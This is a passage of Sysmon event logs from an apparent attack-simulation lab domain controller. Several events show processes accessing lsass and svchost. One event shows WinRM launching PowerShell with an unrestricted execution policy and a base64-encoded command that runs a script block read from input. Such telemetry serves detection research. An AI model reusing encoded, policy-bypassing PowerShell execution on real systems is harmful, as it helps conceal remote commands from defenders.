05:52:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1788","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010FC520A00}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.076\r\nProcessGuid: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nProcessId: 4324\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-0010FC520A00}\r\nParentProcessId: 3396\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.076","ProcessGuid":"{A837DB8D-032E-5F25-0000-0010B8550A00}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-0010FC520A00}","ParentProcessId":"3396","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-0010FC520A00}\r\nSourceProcessId: 3396\r\nSourceThreadId: 3256\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 